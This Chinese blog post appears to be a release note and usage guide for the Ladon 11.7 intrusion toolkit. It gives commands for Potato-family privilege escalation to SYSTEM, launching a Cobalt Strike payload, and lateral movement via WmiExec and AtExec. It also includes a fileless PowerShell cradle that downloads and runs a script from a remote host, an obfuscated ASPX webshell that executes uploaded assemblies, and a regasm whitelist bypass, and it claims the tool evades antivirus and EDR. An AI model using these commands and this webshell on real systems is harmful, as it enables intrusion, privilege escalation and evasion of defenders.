正文

Ladon11.7更新3个横向移动5个Potato提权

admin
admin V管理员 /0 评论 /245 阅读
1014
此篇文章发布距今已超过410天,您需要注意文章的内容或图片是否可用! 
Ladon 11.7 20231010解决Cobalt StrikeLadonShell下双引号等问题[u]BadPotato    本地提权 支持Base64参数 [u]EfsPotato    本地提权 支持Base64参数 [u]GodPotato    本地提权 支持Base64参数 [u]SweetPotato    本地提权 支持Base64参数 [u]McpPotato    本地提权 支持Base64参数 [+]clsLog      新增清理最近访问文件记录
9.24[u] WmiExec2    横向移动 内网渗透 修复b64cmd参数Bug[u] WmiExec      横向移动 内网渗透 修复域用户连接Bug[+] AtExec      横向移动 内网渗透 Base64统一为Unicode(如whoami编码 dwBoAG8AYQBtAGkA )
9.18[u]PostShell      hexupload支持任意文件上传-当前目录


Win11 Pro X64提权至System权限

管理员权限下获取SYSTEM权限,执行命令,弹出system权限CMD

Ladon RunSystem cmd.exe


实战不需要弹窗,直接启动C2即可,如CS生成的M为c:1.exe

Ladon RunSystem c:1.exe


服务权限提升至System权限

WebShell下,往往权限比较低,如IIS权限或服务权限等,Ladon内置以下模块Efspotato、godpotato、badpotatosweetpotato、iislpe等均可提升至SYSTEM权限。mssqlcmd也内置sweetpotato、badpotato一键提升至SYSTEM权限。

Ladon EfsPotato whoamiLadon BadPotato whoamiLadon SweetPotato whoamiLadon GodPotato whoamiLadon McpPotato whoami

解决CS或其它shell下使用双引号,截断参数的问题

Cmd使用Base64 Unicode编码,注意是unicode,网上很多工具的Base64加密,可能无法使用,因为它们基本都是utf8编码,相关横向移动模块如WmiExec、atexec等或bypassUAC凡是出现b64cmd用法一致

whoami加密后结果

Ladon EfsPotato dwBoAG8AYQBtAGkALadon BadPotato dwBoAG8AYQBtAGkALadon SweetPotato dwBoAG8AYQBtAGkALadon GodPotato dwBoAG8AYQBtAGkALadon McpPotato dwBoAG8AYQBtAGkA

CobaltStrike下用法一致,当然也可右键菜单使用,更直观


PowerShell本地用法(ps1需上传,比起exe免杀效果更好)

powershell -exec bypass Import-Module .Ladon.ps1;Ladon McpPotato whoami


PowerShell内存加载 无文件落地用法

先使用Ladon web 80开启迷你web服务器

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon McpPotato whoami"


LadonShell内存加载

在目标服务器植入以下aspx一句话,使用LadonShell连接,接下来就可以像在CS的beacon命令行下内存加载使用Ladon大部分功能了。整个过程渗透工具都不用上传至目标磁盘,目前市面上应该是唯一的

<%@ Page Language="C#" Debug="true" %><%@ Import Namespace="Su0079stu0065m.Diagu006eu006fsu0074u0069cs" %><%@ Import Namespace="Syu0073u0074em.Reu0066u006cu0065ction" %><script runat="server">    protected void Page_Load(object sender, EventArgs e)    {        if (!Page.IsPostBack)        {        string p="tom";            string c = Reu0071u0075u0065st.Cou006fu006bies[p] != null ? Server.Htmlu0045u006eu0063ode(Ru0065u0071uest.Coou006bu0069u0065s[p].Value) : null;            string[] g = null;            if (c != null)            {                byte[] b = Convert.FromBase64String(c);                string d = Encoding.UTF8.GetString(b);                g = d.Split(' ');                Su0079stem.Refu006cu0065u0063tion.Asu0073u0065u006dbly assu0065u006dbly = Syu0073u0074em.Reflu0065u0063u0074ion.Asu0073u0065u006dbly.Load(Reu0071uu0065st.Biu006eu0061ryRead(Reu0071u0075u0065st.TotalBytes));                Type[] types = assu0065u006dbly.GetTypes();                foreach (Type type in types)                {                    MethodInfo mt = type.Getu004du0065u0074hod("Main", BindingFlags.Public | BindingFlags.Static);                    if (mt != null)                    {                        Syu0073u0074em.IO.StringWriter sw = new Syu0073u0074em.IO.StringWriter();                        Console.SetOut(sw);                                         mt.Inu0076u006fke(null, new object[] { g });                                 Console.SetOut(new Syu0073u0074em.IO.StreamWriter(Console.OpenStandardOutput()));                        string o = sw.ToString();                        Response.Write(o);                        break;                    }                }                   }        }    }</script>

工具下必须包含Ladon的CS插件目录,特别是以下文件不能缺

PS:  dat文件也可以单独使用,体积非常小,如LadonInfo.dat是信息收集,包含各种协议,所有发包都是正常协议请求,不会被杀软和EDR拦截,系统里记录的也是正常日志,不会触发报警,不会引起怀疑。因为管理员或者是EDR处理可疑行为日志都来不及,更没功夫看正常日志。

Regasm白名单用法

C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U Ladon.exe McpPotato whoami




推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下